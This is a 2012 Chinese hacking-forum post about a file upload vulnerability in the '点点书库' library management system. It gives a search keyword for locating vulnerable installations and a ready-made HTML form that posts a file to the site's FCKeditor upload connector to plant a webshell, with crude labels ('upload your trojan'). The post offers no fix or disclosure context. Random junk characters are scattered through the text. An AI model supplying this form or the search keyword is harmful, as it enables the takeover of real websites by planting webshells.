主题:图书馆系统任意文件上传漏洞
) j- f& t7 p! P+ s( ` 作者:冰锋刺客+ ?: W5 ?. A* |$ ]
厂商:点击书(dianjishu.com)
( V ]1 @: ^' r& e 日期:2012-6-21, A8 J/ H& c* C H$ }8 {
" p. t! r2 J6 g6 G$ _I 概述
' }/ c. I: a! L, D$ q( d6 Z- V 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
" V; a6 p. ^, ^( S0 p II 简介
?6 |& a3 q# f: _6 O# k. d( D 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
0 u+ Z4 ^% ?5 D+ C) O 补充一个漏洞8 R+ F2 j+ x, A% `0 ~0 o0 E: }" H
<form id="frmUpload" enctype="multipart/form-data"" ^) S) J) }. L+ ~/ c
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
8 d$ k. i) F, u% y- u <input id="btnUpload" type="submit" value="操翻他">1 g1 c1 N) E; i
</form>+ l+ Y c* U q& G4 ~( S1 p* Y
你们懂的% u' a/ G3 ]' k7 l! w/ _
那傻逼提供还需要改包.
% c B" V0 Q2 Q: U1 ^+ _- I9 } 自己看了下源代码发现fckeditor8 y/ q( ]; T g9 ~
直接秒杀- Y' u" q2 N( x- b( J1 F7 o
|
发表于 2012-9-10 21:20:59
收藏
支持
反对